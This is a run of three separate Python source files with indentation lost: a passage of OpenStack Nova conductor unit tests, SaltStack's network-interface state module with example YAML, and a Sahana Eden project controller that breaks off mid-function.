self.mox.StubOutWithMock(
db, 'block_device_mapping_destroy_by_instance_and_device')
self.mox.StubOutWithMock(
db, 'block_device_mapping_destroy_by_instance_and_volume')
db.block_device_mapping_destroy(self.context, 'fake-bdm')
db.block_device_mapping_destroy_by_instance_and_device(self.context,
'fake-uuid',
'fake-device')
db.block_device_mapping_destroy_by_instance_and_volume(self.context,
'fake-uuid',
'fake-volume')
self.mox.ReplayAll()
self.conductor.block_device_mapping_destroy(self.context, [fake_bdm])
self.conductor.block_device_mapping_destroy_by_instance_and_device(
self.context, fake_inst, 'fake-device')
self.conductor.block_device_mapping_destroy_by_instance_and_volume(
self.context, fake_inst, 'fake-volume')
def _test_stubbed(self, name, *args, **kwargs):
if args and isinstance(args[0], FakeContext):
ctxt = args[0]
args = args[1:]
else:
ctxt = self.context
db_exception = kwargs.get('db_exception')
self.mox.StubOutWithMock(db, name)
if db_exception:
getattr(db, name)(ctxt, *args).AndRaise(db_exception)
else:
getattr(db, name)(ctxt, *args).AndReturn('fake-result')
if name == 'service_destroy':
# TODO(russellb) This is a hack ... setUp() starts the conductor
# service. There is a cleanup step that runs after this test which
# also deletes the associated service record. This involves a call
# to db.service_destroy(), which we have stubbed out.
db.service_destroy(mox.IgnoreArg(), mox.IgnoreArg())
self.mox.ReplayAll()
if db_exception:
self.assertRaises(db_exception.__class__,
getattr(self.conductor, name),
self.context, *args)
else:
result = getattr(self.conductor, name)(self.context, *args)
self.assertEqual(
result, 'fake-result' if kwargs.get('returns', True) else None)
def test_service_get_all(self):
self._test_stubbed('service_get_all')
def test_service_get_by_host_and_topic(self):
self._test_stubbed('service_get_by_host_and_topic', 'host', 'topic')
def test_service_get_all_by_topic(self):
self._test_stubbed('service_get_all_by_topic', 'topic')
def test_service_get_all_by_host(self):
self._test_stubbed('service_get_all_by_host', 'host')
def test_service_get_by_compute_host(self):
self._test_stubbed('service_get_by_compute_host', 'host')
def test_service_get_by_args(self):
self._test_stubbed('service_get_by_args', 'host', 'binary')
def test_service_get_by_compute_host_not_found(self):
self._test_stubbed('service_get_by_compute_host', 'host',
db_exception=exc.ComputeHostNotFound(host='host'))
def test_service_get_by_args_not_found(self):
self._test_stubbed('service_get_by_args', 'host', 'binary',
db_exception=exc.HostBinaryNotFound(binary='binary',
host='host'))
def test_service_create(self):
self._test_stubbed('service_create', {})
def test_service_destroy(self):
self._test_stubbed('service_destroy', '', returns=False)
def test_service_update(self):
ctxt = self.context
self.mox.StubOutWithMock(db, 'service_update')
db.service_update(ctxt, '', {}).AndReturn('fake-result')
self.mox.ReplayAll()
result = self.conductor.service_update(self.context, {'id': ''}, {})
self.assertEqual(result, 'fake-result')
def test_instance_get_all_by_host_and_node(self):
self._test_stubbed('instance_get_all_by_host_and_node',
self.context.elevated(), 'host', 'node')
def test_instance_get_all_by_host(self):
self.mox.StubOutWithMock(db, 'instance_get_all_by_host')
self.mox.StubOutWithMock(db, 'instance_get_all_by_host_and_node')
db.instance_get_all_by_host(self.context.elevated(), 'host',
None).AndReturn('fake-result')
self.mox.ReplayAll()
result = self.conductor.instance_get_all_by_host(self.context,
'host')
self.assertEqual(result, 'fake-result')
def test_wait_until_ready(self):
timeouts = []
calls = dict(count=0)
def fake_ping(context, message, timeout):
timeouts.append(timeout)
calls['count'] += 1
if calls['count'] < 15:
raise rpc_common.Timeout("fake")
self.stubs.Set(self.conductor.base_rpcapi, 'ping', fake_ping)
self.conductor.wait_until_ready(self.context)
self.assertEqual(timeouts.count(10), 10)
self.assertTrue(None in timeouts)
def test_security_groups_trigger_handler(self):
self.mox.StubOutWithMock(self.conductor_manager.security_group_api,
'trigger_handler')
self.conductor_manager.security_group_api.trigger_handler('event',
self.context,
'arg')
self.mox.ReplayAll()
self.conductor.security_groups_trigger_handler(self.context,
'event', 'arg')
class ConductorLocalAPITestCase(ConductorAPITestCase):
"""Conductor LocalAPI Tests."""
def setUp(self):
super(ConductorLocalAPITestCase, self).setUp()
self.conductor = conductor_api.LocalAPI()
self.conductor_manager = self.conductor._manager._target
self.db = db
def test_client_exceptions(self):
instance = self._create_fake_instance()
# NOTE(danms): The LocalAPI should not raise exceptions wrapped
# in ClientException. KeyError should be raised if an invalid
# update key is passed, so use that to validate.
self.assertRaises(KeyError,
self._do_update, instance['uuid'], foo='bar')
def test_wait_until_ready(self):
# Override test in ConductorAPITestCase
pass
class ConductorImportTest(test.TestCase):
def test_import_conductor_local(self):
self.flags(use_local=True, group='conductor')
self.assertTrue(isinstance(conductor.API(),
conductor_api.LocalAPI))
self.assertTrue(isinstance(conductor.ComputeTaskAPI(),
conductor_api.LocalComputeTaskAPI))
def test_import_conductor_rpc(self):
self.flags(use_local=False, group='conductor')
self.assertTrue(isinstance(conductor.API(),
conductor_api.API))
self.assertTrue(isinstance(conductor.ComputeTaskAPI(),
conductor_api.ComputeTaskAPI))
def test_import_conductor_override_to_local(self):
self.flags(use_local=False, group='conductor')
self.assertTrue(isinstance(conductor.API(use_local=True),
conductor_api.LocalAPI))
self.assertTrue(isinstance(conductor.ComputeTaskAPI(use_local=True),
conductor_api.LocalComputeTaskAPI))
class ConductorPolicyTest(test.TestCase):
def test_all_allowed_keys(self):
def fake_db_instance_update(self, *args, **kwargs):
return None, None
self.stubs.Set(db, 'instance_update_and_get_original',
fake_db_instance_update)
ctxt = context.RequestContext('fake-user', 'fake-project')
conductor = conductor_api.LocalAPI()
updates = {}
for key in conductor_manager.allowed_updates:
if key in conductor_manager.datetime_fields:
updates[key] = timeutils.utcnow()
else:
updates[key] = 'foo'
conductor.instance_update(ctxt, 'fake-instance', **updates)
def test_allowed_keys_are_real(self):
instance = models.Instance()
keys = list(conductor_manager.allowed_updates)
# NOTE(danms): expected_task_state is a parameter that gets
# passed to the db layer, but is not actually an instance attribute
del keys[keys.index('expected_task_state')]
for key in keys:
self.assertTrue(hasattr(instance, key))
class _BaseTaskTestCase(object):
def setUp(self):
super(_BaseTaskTestCase, self).setUp()
self.user_id = 'fake'
self.project_id = 'fake'
self.context = FakeContext(self.user_id, self.project_id)
fake_instance_actions.stub_out_action_events(self.stubs)
def test_migrate_server(self):
self.mox.StubOutWithMock(self.conductor_manager.scheduler_rpcapi,
'live_migration')
self.conductor_manager.scheduler_rpcapi.live_migration(self.context,
'block_migration', 'disk_over_commit', 'instance', 'destination')
self.mox.ReplayAll()
self.conductor.migrate_server(self.context, 'instance',
{'host': 'destination'}, True, False, None, 'block_migration',
'disk_over_commit')
def test_migrate_server_fails_with_non_live(self):
self.assertRaises(NotImplementedError, self.conductor.migrate_server,
self.context, None, None, False, False, None, None, None)
def test_migrate_server_fails_with_rebuild(self):
self.assertRaises(NotImplementedError, self.conductor.migrate_server,
self.context, None, None, True, True, None, None, None)
def test_migrate_server_fails_with_flavor(self):
self.assertRaises(NotImplementedError, self.conductor.migrate_server,
self.context, None, None, True, False, "dummy", None, None)
def test_build_instances(self):
instance_type = flavors.get_default_flavor()
system_metadata = flavors.save_flavor_info({}, instance_type)
# NOTE(alaski): instance_type -> system_metadata -> instance_type
# loses some data (extra_specs). This build process is using
# scheduler/utils:build_request_spec() which extracts flavor from
# system_metadata and will re-query the DB for extra_specs, so
# we need to test this properly
expected_instance_type = flavors.extract_flavor(
{'system_metadata': system_metadata})
expected_instance_type['extra_specs'] = 'fake-specs'
self.mox.StubOutWithMock(db, 'flavor_extra_specs_get')
self.mox.StubOutWithMock(self.conductor_manager.scheduler_rpcapi,
'run_instance')
db.flavor_extra_specs_get(
self.context,
instance_type['flavorid']).AndReturn('fake-specs')
self.conductor_manager.scheduler_rpcapi.run_instance(self.context,
request_spec={
'image': {'fake_data': 'should_pass_silently'},
'instance_properties': {'system_metadata': system_metadata,
'uuid': 'fakeuuid'},
'instance_type': expected_instance_type,
'instance_uuids': ['fakeuuid', 'fakeuuid2'],
'block_device_mapping': 'block_device_mapping',
'security_group': 'security_groups',
'num_instances': 2},
admin_password='admin_password',
injected_files='injected_files',
requested_networks='requested_networks', is_first_time=True,
filter_properties={})
self.mox.ReplayAll()
self.conductor.build_instances(self.context,
instances=[{'uuid': 'fakeuuid',
'system_metadata': system_metadata},
{'uuid': 'fakeuuid2'}],
image={'fake_data': 'should_pass_silently'},
filter_properties={},
admin_password='admin_password',
injected_files='injected_files',
requested_networks='requested_networks',
security_groups='security_groups',
block_device_mapping='block_device_mapping')
def test_unshelve_instance_on_host(self):
db_instance = jsonutils.to_primitive(self._create_fake_instance())
instance = instance_obj.Instance.get_by_uuid(self.context,
db_instance['uuid'], expected_attrs=['system_metadata'])
instance.vm_state = vm_states.SHELVED
instance.task_state = task_states.UNSHELVING
instance.save()
system_metadata = instance.system_metadata
self.mox.StubOutWithMock(self.conductor_manager.compute_rpcapi,
'start_instance')
self.mox.StubOutWithMock(self.conductor_manager, '_delete_image')
self.mox.StubOutWithMock(self.conductor_manager.compute_rpcapi,
'unshelve_instance')
self.conductor_manager.compute_rpcapi.start_instance(self.context,
instance)
self.conductor_manager._delete_image(self.context,
'fake_image_id')
self.mox.ReplayAll()
system_metadata['shelved_at'] = timeutils.utcnow()
system_metadata['shelved_image_id'] = 'fake_image_id'
system_metadata['shelved_host'] = 'fake-mini'
self.conductor_manager.unshelve_instance(self.context, instance)
def test_unshelve_instance_schedule_and_rebuild(self):
db_instance = jsonutils.to_primitive(self._create_fake_instance())
instance = instance_obj.Instance.get_by_uuid(self.context,
db_instance['uuid'], expected_attrs=['system_metadata'])
instance.vm_state = vm_states.SHELVED_OFFLOADED
instance.save()
system_metadata = instance.system_metadata
self.mox.StubOutWithMock(self.conductor_manager, '_get_image')
self.mox.StubOutWithMock(self.conductor_manager, '_schedule_instances')
self.mox.StubOutWithMock(self.conductor_manager.compute_rpcapi,
'unshelve_instance')
self.conductor_manager._get_image(self.context,
'fake_image_id').AndReturn('fake_image')
self.conductor_manager._schedule_instances(self.context,
'fake_image', [], instance).AndReturn(
[{'host': 'fake_host'}])
self.conductor_manager.compute_rpcapi.unshelve_instance(self.context,
instance, 'fake_host', 'fake_image')
self.mox.ReplayAll()
system_metadata['shelved_at'] = timeutils.utcnow()
system_metadata['shelved_image_id'] = 'fake_image_id'
system_metadata['shelved_host'] = 'fake-mini'
self.conductor_manager.unshelve_instance(self.context, instance)
def test_unshelve_instance_schedule_and_rebuild_volume_backed(self):
db_instance = jsonutils.to_primitive(self._create_fake_instance())
instance = instance_obj.Instance.get_by_uuid(self.context,
db_instance['uuid'], expected_attrs=['system_metadata'])
instance.vm_state = vm_states.SHELVED_OFFLOADED
instance.save()
system_metadata = instance.system_metadata
self.mox.StubOutWithMock(self.conductor_manager, '_get_image')
self.mox.StubOutWithMock(self.conductor_manager, '_schedule_instances')
self.mox.StubOutWithMock(self.conductor_manager.compute_rpcapi,
'unshelve_instance')
self.conductor_manager._get_image(self.context,
'fake_image_id').AndReturn(None)
self.conductor_manager._schedule_instances(self.context,
None, [], instance).AndReturn(
[{'host': 'fake_host'}])
self.conductor_manager.compute_rpcapi.unshelve_instance(self.context,
instance, 'fake_host', None)
self.mox.ReplayAll()
system_metadata['shelved_at'] = timeutils.utcnow()
system_metadata['shelved_image_id'] = 'fake_image_id'
system_metadata['shelved_host'] = 'fake-mini'
self.conductor_manager.unshelve_instance(self.context, instance)
class ConductorTaskTestCase(_BaseTaskTestCase, test_compute.BaseTestCase):
"""ComputeTaskManager Tests."""
def setUp(self):
super(ConductorTaskTestCase, self).setUp()
self.conductor = conductor_manager.ComputeTaskManager()
self.conductor_manager = self.conductor
class ConductorTaskRPCAPITestCase(_BaseTaskTestCase,
test_compute.BaseTestCase):
"""Conductor compute_task RPC namespace Tests."""
def setUp(self):
super(ConductorTaskRPCAPITestCase, self).setUp()
self.conductor_service = self.start_service(
'conductor', manager='nova.conductor.manager.ConductorManager')
self.conductor = conductor_rpcapi.ComputeTaskAPI()
service_manager = self.conductor_service.manager
self.conductor_manager = service_manager.compute_task_mgr
class ConductorTaskAPITestCase(_BaseTaskTestCase, test_compute.BaseTestCase):
"""Compute task API Tests."""
def setUp(self):
super(ConductorTaskAPITestCase, self).setUp()
self.conductor_service = self.start_service(
'conductor', manager='nova.conductor.manager.ConductorManager')
self.conductor = conductor_api.ComputeTaskAPI()
service_manager = self.conductor_service.manager
self.conductor_manager = service_manager.compute_task_mgr
class ConductorLocalComputeTaskAPITestCase(ConductorTaskAPITestCase):
"""Conductor LocalComputeTaskAPI Tests."""
def setUp(self):
super(ConductorLocalComputeTaskAPITestCase, self).setUp()
self.conductor = conductor_api.LocalComputeTaskAPI()
self.conductor_manager = self.conductor._manager._target
|
|
# -*- coding: utf-8 -*-
'''
Configuration of network interfaces
===================================
The network module is used to create and manage network settings,
interfaces can be set as either managed or ignored. By default
all interfaces are ignored unless specified.
.. note::
Prior to version 2014.1.0, only RedHat-based systems (RHEL,
CentOS, Scientific Linux, etc.) were supported. Support for Debian/Ubuntu is
new in 2014.1.0 and should be considered experimental.
Other platforms are not yet supported.
.. code-block:: yaml
system:
network.system:
- enabled: True
- hostname: server1.example.com
- gateway: 192.168.0.1
- gatewaydev: eth0
- nozeroconf: True
- nisdomain: example.com
- require_reboot: True
eth0:
network.managed:
- enabled: True
- type: eth
- proto: none
- ipaddr: 10.1.0.1
- netmask: 255.255.255.0
- dns:
- 8.8.8.8
- 8.8.4.4
eth0-range0:
network.managed:
- type: eth
- ipaddr_start: 192.168.1.1
- ipaddr_end: 192.168.1.10
- clonenum_start: 10
- mtu: 9000
bond0-range0:
network.managed:
- type: eth
- ipaddr_start: 192.168.1.1
- ipaddr_end: 192.168.1.10
- clonenum_start: 10
- mtu: 9000
eth1.0-range0:
network.managed:
- type: eth
- ipaddr_start: 192.168.1.1
- ipaddr_end: 192.168.1.10
- clonenum_start: 10
- vlan: True
- mtu: 9000
bond0.1-range0:
network.managed:
- type: eth
- ipaddr_start: 192.168.1.1
- ipaddr_end: 192.168.1.10
- clonenum_start: 10
- vlan: True
- mtu: 9000
.. note::
Ranged interfaces (vlan, bond and eth) are supported on RedHat-based systems.
Important: the interface type must be eth.
routes:
network.routes:
- name: eth0
- routes:
- name: secure_network
ipaddr: 10.2.0.0
netmask: 255.255.255.0
gateway: 10.1.0.3
- name: HQ_network
ipaddr: 10.100.0.0
netmask: 255.255.0.0
gateway: 10.1.0.10
eth2:
network.managed:
- enabled: True
- type: slave
- master: bond0
eth3:
network.managed:
- enabled: True
- type: slave
- master: bond0
eth4:
network.managed:
- enabled: True
- type: eth
- proto: dhcp
- bridge: br0
eth5:
network.managed:
- enabled: True
- type: eth
- proto: dhcp
- noifupdown: True # Do not restart the interface
# you need to reboot/reconfigure manually
bond0:
network.managed:
- type: bond
- ipaddr: 10.1.0.1
- netmask: 255.255.255.0
- mode: active-backup
- proto: static
- dns:
- 8.8.8.8
- 8.8.4.4
- ipv6:
- enabled: False
- slaves: eth2 eth3
- require:
- network: eth2
- network: eth3
- miimon: 100
- arp_interval: 250
- downdelay: 200
- lacp_rate: fast
- max_bonds: 1
- updelay: 0
- use_carrier: on
- xmit_hash_policy: layer2
- mtu: 9000
- autoneg: on
- speed: 1000
- duplex: full
- rx: on
- tx: off
- sg: on
- tso: off
- ufo: off
- gso: off
- gro: off
- lro: off
bond0.2:
network.managed:
- type: vlan
- ipaddr: 10.1.0.2
- use:
- network: bond0
- require:
- network: bond0
bond0.3:
network.managed:
- type: vlan
- ipaddr: 10.1.0.3
- use:
- network: bond0
- require:
- network: bond0
bond0.10:
network.managed:
- type: vlan
- ipaddr: 10.1.0.4
- use:
- network: bond0
- require:
- network: bond0
bond0.12:
network.managed:
- type: vlan
- ipaddr: 10.1.0.5
- use:
- network: bond0
- require:
- network: bond0
br0:
network.managed:
- enabled: True
- type: bridge
- proto: dhcp
- bridge: br0
- delay: 0
- ports: eth4
- bypassfirewall: True
- use:
- network: eth4
- require:
- network: eth4
system:
network.system:
- enabled: True
- hostname: server1.example.com
- gateway: 192.168.0.1
- gatewaydev: eth0
- nozeroconf: True
- nisdomain: example.com
- require_reboot: True
- apply_hostname: True
lo:
network.managed:
- name: lo
- type: eth
- onboot: yes
- userctl: no
- ipv6_autoconf: no
- enable_ipv6: true
- ipaddrs:
- 127.0.0.1/8
- 10.1.0.4/32
- 10.1.0.12/32
- ipv6addrs:
- fc00::1/128
- fc00::100/128
.. note::
Apply changes to hostname immediately.
.. versionadded:: 2015.5.0
.. note::
When managing bridged interfaces on a Debian or Ubuntu based system, the
ports argument is required. Red Hat systems will ignore the argument.
'''
from __future__ import absolute_import
# Import python libs
import difflib
import salt.utils
import salt.utils.network
import salt.loader
# Set up logging
import logging
log = logging.getLogger(__name__)
def __virtual__():
'''
Confine this module to non-Windows systems with the required execution
module available.
'''
if not salt.utils.is_windows() and 'ip.get_interface' in __salt__:
return True
return False
def managed(name, type, enabled=True, **kwargs):
'''
Ensure that the named interface is configured properly.
name
The name of the interface to manage
type
Type of interface and configuration.
enabled
Designates the state of this interface.
kwargs
The IP parameters for this interface.
'''
# For this function we are purposefully shadowing the built-in `type`
# to enhance the user experience. This does not look like it will cause
# a problem, but it is worth a heads-up in case it ever does.
ret = {
'name': name,
'changes': {},
'result': True,
'comment': 'Interface {0} is up to date.'.format(name),
}
if 'test' not in kwargs:
kwargs['test'] = __opts__.get('test', False)
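# In test mode the state only reports the pending diff; it returns before
# any interface is brought up or down.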
# set ranged status
apply_ranged_setting = False
# Build interface
try:
old = __salt__['ip.get_interface'](name)
new = __salt__['ip.build_interface'](name, type, enabled, **kwargs)
if kwargs['test']:
if old == new:
pass
if not old and new:
ret['result'] = None
ret['comment'] = 'Interface {0} is set to be ' \
'added.'.format(name)
elif old != new:
diff = difflib.unified_diff(old, new, lineterm='')
ret['result'] = None
ret['comment'] = 'Interface {0} is set to be ' \
'updated:\n{1}'.format(name, '\n'.join(diff))
else:
if not old and new:
ret['comment'] = 'Interface {0} ' \
'added.'.format(name)
ret['changes']['interface'] = 'Added network interface.'
apply_ranged_setting = True
elif old != new:
diff = difflib.unified_diff(old, new, lineterm='')
ret['comment'] = 'Interface {0} ' \
'updated.'.format(name)
ret['changes']['interface'] = '\n'.join(diff)
apply_ranged_setting = True
except AttributeError as error:
ret['result'] = False
ret['comment'] = str(error)
return ret
# Debian based systems can have a type of 'source' in the interfaces
# file; we don't ifup or ifdown it
if type == 'source':
return ret
# Set up the bond modprobe script if required
if type == 'bond':
try:
old = __salt__['ip.get_bond'](name)
new = __salt__['ip.build_bond'](name, **kwargs)
if kwargs['test']:
if not old and new:
ret['result'] = None
ret['comment'] = 'Bond interface {0} is set to be ' \
'added.'.format(name)
elif old != new:
diff = difflib.unified_diff(old, new, lineterm='')
ret['result'] = None
ret['comment'] = 'Bond interface {0} is set to be ' \
'updated:\n{1}'.format(name, '\n'.join(diff))
else:
if not old and new:
ret['comment'] = 'Bond interface {0} ' \
'added.'.format(name)
ret['changes']['bond'] = 'Added bond {0}.'.format(name)
apply_ranged_setting = True
elif old != new:
diff = difflib.unified_diff(old, new, lineterm='')
ret['comment'] = 'Bond interface {0} ' \
'updated.'.format(name)
ret['changes']['bond'] = '\n'.join(diff)
apply_ranged_setting = True
except AttributeError as error:
#TODO Add a way of reversing the interface changes.
ret['result'] = False
ret['comment'] = str(error)
return ret
if kwargs['test']:
return ret
# For RedHat/CentOS ranged network interfaces
if "range" in name:
if apply_ranged_setting:
try:
ret['result'] = __salt__['service.restart']('network')
ret['comment'] = "network restarted for change of ranged interfaces"
return ret
except Exception as error:
ret['result'] = False
ret['comment'] = str(error)
return ret
ret['result'] = True
ret['comment'] = "no change, passing it"
return ret
# Bring up/shutdown interface
try:
# Get Interface current status
interfaces = salt.utils.network.interfaces()
interface_status = False
if name in interfaces:
interface_status = interfaces[name].get('up')
else:
for iface in interfaces:
if 'secondary' in interfaces[iface]:
for second in interfaces[iface]['secondary']:
if second.get('label', '') == name:
interface_status = True
if enabled:
if 'noifupdown' not in kwargs:
if interface_status:
if ret['changes']:
# Restart the interface to validate the new configuration
__salt__['ip.down'](name, type)
__salt__['ip.up'](name, type)
ret['changes']['status'] = 'Interface {0} restarted to validate'.format(name)
return ret
else:
__salt__['ip.up'](name, type)
ret['changes']['status'] = 'Interface {0} is up'.format(name)
else:
if 'noifupdown' not in kwargs:
if interface_status:
__salt__['ip.down'](name, type)
ret['changes']['status'] = 'Interface {0} down'.format(name)
except Exception as error:
ret['result'] = False
ret['comment'] = str(error)
return ret
# TODO: create saltutil.refresh_grains that fires events to the minion daemon
grains_info = salt.loader.grains(__opts__, True)
__grains__.update(grains_info)
__salt__['saltutil.refresh_modules']()
return ret
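# Illustrative sketch (not part of the state itself) of how the change
# comments above are produced: the old and new interface configurations are
# compared line by line with difflib.unified_diff and joined into a single
# string. The sample data below is assumed purely for illustration.
#
#   import difflib
#   old = ['DEVICE=eth0', 'BOOTPROTO=dhcp']
#   new = ['DEVICE=eth0', 'BOOTPROTO=none', 'IPADDR=10.1.0.1']
#   print('\n'.join(difflib.unified_diff(old, new, lineterm='')))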
def routes(name, **kwargs):
'''
Manage network interface static routes.
name
Interface name to apply the route to.
kwargs
Named routes
'''
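# The flow mirrors managed(): build the new route configuration, diff it
# against the current one, and only apply the result when not in test mode.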
ret = {
'name': name,
'changes': {},
'result': True,
'comment': 'Interface {0} routes are up to date.'.format(name),
}
apply_routes = False
if 'test' not in kwargs:
kwargs['test'] = __opts__.get('test', False)
# Build interface routes
try:
old = __salt__['ip.get_routes'](name)
new = __salt__['ip.build_routes'](name, **kwargs)
if kwargs['test']:
if old == new:
return ret
if not old and new:
ret['result'] = None
ret['comment'] = 'Interface {0} routes are set to be added.'.format(name)
return ret
elif old != new:
diff = difflib.unified_diff(old, new, lineterm='')
ret['result'] = None
ret['comment'] = 'Interface {0} routes are set to be ' \
'updated:\n{1}'.format(name, '\n'.join(diff))
return ret
if not old and new:
apply_routes = True
ret['comment'] = 'Interface {0} routes added.'.format(name)
ret['changes']['network_routes'] = 'Added interface {0} routes.'.format(name)
elif old != new:
diff = difflib.unified_diff(old, new, lineterm='')
apply_routes = True
ret['comment'] = 'Interface {0} routes updated.'.format(name)
ret['changes']['network_routes'] = '\n'.join(diff)
except AttributeError as error:
ret['result'] = False
ret['comment'] = str(error)
return ret
# Apply interface routes
if apply_routes:
try:
__salt__['ip.apply_network_settings'](**kwargs)
except AttributeError as error:
ret['result'] = False
ret['comment'] = str(error)
return ret
return ret
def system(name, **kwargs):
'''
Ensure that global network settings are configured properly.
name
Custom name to represent this configuration change.
kwargs
The global parameters for the system.
'''
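# Global settings (hostname, default gateway, etc.) are built and diffed the
# same way as interface configs and pushed with ip.apply_network_settings.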
ret = {
'name': name,
'changes': {},
'result': True,
'comment': 'Global network settings are up to date.',
}
apply_net_settings = False
kwargs['test'] = __opts__['test']
# Build global network settings
try:
old = __salt__['ip.get_network_settings']()
new = __salt__['ip.build_network_settings'](**kwargs)
if __opts__['test']:
if old == new:
return ret
if not old and new:
ret['result'] = None
ret['comment'] = 'Global network settings are set to be added.'
return ret
elif old != new:
diff = difflib.unified_diff(old, new, lineterm='')
ret['result'] = None
ret['comment'] = 'Global network settings are set to be ' \
'updated:\n{0}'.format('\n'.join(diff))
return ret
if not old and new:
apply_net_settings = True
ret['changes']['network_settings'] = 'Added global network settings.'
elif old != new:
diff = difflib.unified_diff(old, new, lineterm='')
apply_net_settings = True
ret['changes']['network_settings'] = '\n'.join(diff)
except AttributeError as error:
ret['result'] = False
ret['comment'] = str(error)
return ret
# Apply global network settings
if apply_net_settings:
try:
__salt__['ip.apply_network_settings'](**kwargs)
except AttributeError as error:
ret['result'] = False
ret['comment'] = str(error)
return ret
return ret
|
|
# -*- coding: utf-8 -*-
"""
Project Tracking & Management
"""
module = request.controller
resourcename = request.function
if not settings.has_module(module):
raise HTTP(404, body="Module disabled: %s" % module)
mode_task = settings.get_project_mode_task()
# =============================================================================
def index():
""" Module's Home Page """
if mode_task:
# Bypass home page & go direct to browsing Tasks for a Project
s3_redirect_default(URL(f="project", vars={"tasks":1}))
else:
# Bypass home page & go direct to filterable list of Projects
s3_redirect_default(URL(f="project"))
# =============================================================================
def create():
""" Redirect to project/create """
redirect(URL(f="project", args="create"))
# -----------------------------------------------------------------------------
def project():
""" RESTful CRUD controller """
if "tasks" in get_vars:
# Open-Tasks-For-Project Selector
return open_tasks_for_project()
# Pre-process
def prep(r):
# Location Filter
s3db.gis_location_filter(r)
component = r.component
component_name = component.name if component else None
hr_group = r.get_vars.get("group")
if r.method == "datalist":
# Set list_fields for renderer (project_project_list_layout)
s3db.configure("project_project",
list_fields = ["name",
"description",
"location.location_id",
"start_date",
"organisation_id",
"organisation_id$logo",
"modified_by",
]
)
# Filter human resource records if "group" in get_vars
elif component_name == "human_resource":
type_field = FS("human_resource.type")
if hr_group == "staff":
query = (type_field == 1)
elif hr_group == "volunteer":
query = (type_field == 2)
else:
query = None
if query:
r.resource.add_component_filter("human_resource", query)
if r.interactive:
htable = s3db.table("hrm_human_resource")
if htable:
htable.person_id.comment = DIV(_class="tooltip",
_title="%s|%s" % (T("Person"),
T("Select the person assigned to this role for this project."),
)
)
if not component:
# Filter Themes based on Sector
if r.record:
table = s3db.project_sector_project
query = (table.project_id == r.id) & \
(table.deleted == False)
rows = db(query).select(table.sector_id)
sector_ids = [row.sector_id for row in rows]
set_theme_requires(sector_ids)
if r.method in ("create", "update"):
# Context from a Profile page?
location_id = get_vars.get("(location)", None)
if location_id:
field = s3db.project_location.location_id
field.default = location_id
field.readable = field.writable = False
organisation_id = get_vars.get("(organisation)", None)
if organisation_id:
field = r.table.organisation_id
field.default = organisation_id
field.readable = field.writable = False
elif r.method == "details":
# Until we can automate this inside s3profile
# - remove the fkey from the list_fields
configure = s3db.configure
get_config = s3db.get_config
define_resource = s3db.resource
for tablename in ("project_organisation",
"project_location",
"project_beneficiary",
"project_human_resource_project",
):
s3db.table(tablename)
list_fields = get_config(tablename, "list_fields")
if not list_fields:
list_fields = define_resource(tablename).list_fields()
try:
list_fields.remove("project_id")
except:
# Already removed
pass
configure(tablename, list_fields=list_fields)
if r.id:
r.table.human_resource_id.represent = \
s3db.hrm_HumanResourceRepresent(show_link=True)
elif r.get_vars.get("project.status_id", None):
stable = s3db.project_status
status = get_vars.get("project.status_id")
row = db(stable.name == status).select(stable.id,
limitby=(0, 1)).first()
if row:
r.table.status_id.default = row.id
r.table.status_id.writable = False
elif component_name == "organisation":
if r.method != "update":
allowed_roles = dict(settings.get_project_organisation_roles())
if settings.get_template() == "DRRPP":
# Partner NS should only come via sync from RMS
# @ToDo: Move to Template customise
allowed_roles.pop(9, None)
lead_role = 1
otable = s3db.project_organisation
query = (otable.project_id == r.id) & \
(otable.role == lead_role) & \
(otable.deleted != True)
row = db(query).select(otable.id,
limitby=(0, 1)).first()
if row:
# Project has already a lead organisation
# => exclude lead_role in component add-form
allowed_roles.pop(lead_role, None)
otable.role.requires = IS_EMPTY_OR(IS_IN_SET(allowed_roles))
elif component_name == "activity":
# Filter Activity Types/Themes based on Sector
table = s3db.project_sector_project
query = (table.project_id == r.id) & \
(table.deleted == False)
rows = db(query).select(table.sector_id)
sector_ids = [row.sector_id for row in rows]
set_activity_type_requires("project_activity_activity_type", sector_ids)
set_theme_requires(sector_ids)
elif component_name == "goal":
# Not working for embedded create form
#if r.method == "create":
if r.method != "update":
ctable = r.component.table
field = ctable.weighting
field.readable = field.writable = False
ctable.current_status.readable = False
ctable.overall_status.readable = False
elif component_name == "outcome":
if r.method != "update":
ctable = r.component.table
field = ctable.weighting
field.readable = field.writable = False
ctable.current_status.readable = False
ctable.overall_status.readable = False
if settings.get_project_goals():
# Filter to just those for this Project & make mandatory
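# (The same IS_ONE_OF pattern recurs below: filterby/filter_opts restrict
# the selectable rows to those belonging to the current project, and the
# absence of IS_EMPTY_OR makes the field effectively mandatory.)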
r.component.table.goal_id.requires = IS_ONE_OF(db, "project_goal.id",
s3db.project_goal_represent,
sort=True,
filterby="project_id",
filter_opts=[r.id],
)
elif component_name == "output":
if r.method != "update":
ctable = r.component.table
field = ctable.weighting
field.readable = field.writable = False
ctable.current_status.readable = False
ctable.overall_status.readable = False
if settings.get_project_outcomes():
# Filter to just those for this Project & make mandatory
r.component.table.outcome_id.requires = IS_ONE_OF(db, "project_outcome.id",
s3db.project_outcome_represent,
sort=True,
filterby="project_id",
filter_opts=[r.id],
)
elif settings.get_project_goals():
# Filter to just those for this Project & make mandatory
r.component.table.goal_id.requires = IS_ONE_OF(db, "project_goal.id",
s3db.project_goal_represent,
sort=True,
filterby="project_id",
filter_opts=[r.id],
)
elif component_name == "indicator":
if r.method != "update":
ctable = r.component.table
field = ctable.weighting
field.readable = field.writable = False
ctable.current_status.readable = False
ctable.overall_status.readable = False
if settings.get_project_outputs():
# Filter to just those for this Project & make mandatory
r.component.table.output_id.requires = IS_ONE_OF(db, "project_output.id",
s3db.project_output_represent,
sort=True,
filterby="project_id",
filter_opts=[r.id],
)
elif settings.get_project_outcomes():
# Filter to just those for this Project & make mandatory
r.component.table.outcome_id.requires = IS_ONE_OF(db, "project_outcome.id",
s3db.project_outcome_represent,
sort=True,
filterby="project_id",
filter_opts=[r.id],
)
elif settings.get_project_goals():
# Filter to just those for this Project & make mandatory
r.component.table.goal_id.requires = IS_ONE_OF(db, "project_goal.id",
s3db.project_goal_represent,
sort=True,
filterby="project_id",
filter_opts=[r.id],
)
elif component_name == "indicator_data":
ctable = r.component.table
# Filter to just those for this Project & make mandatory
ctable.indicator_id.requires = IS_ONE_OF(db, "project_indicator.id",
s3db.project_indicator_represent,
sort=True,
filterby="project_id",
filter_opts=[r.id],
)
# @ToDo: end_date cannot be before Project Start
#ctable.end_date.requires =
# Have a filter for indicator in indicator data report
#if r.method == "report":
# from s3 import S3OptionsFilter
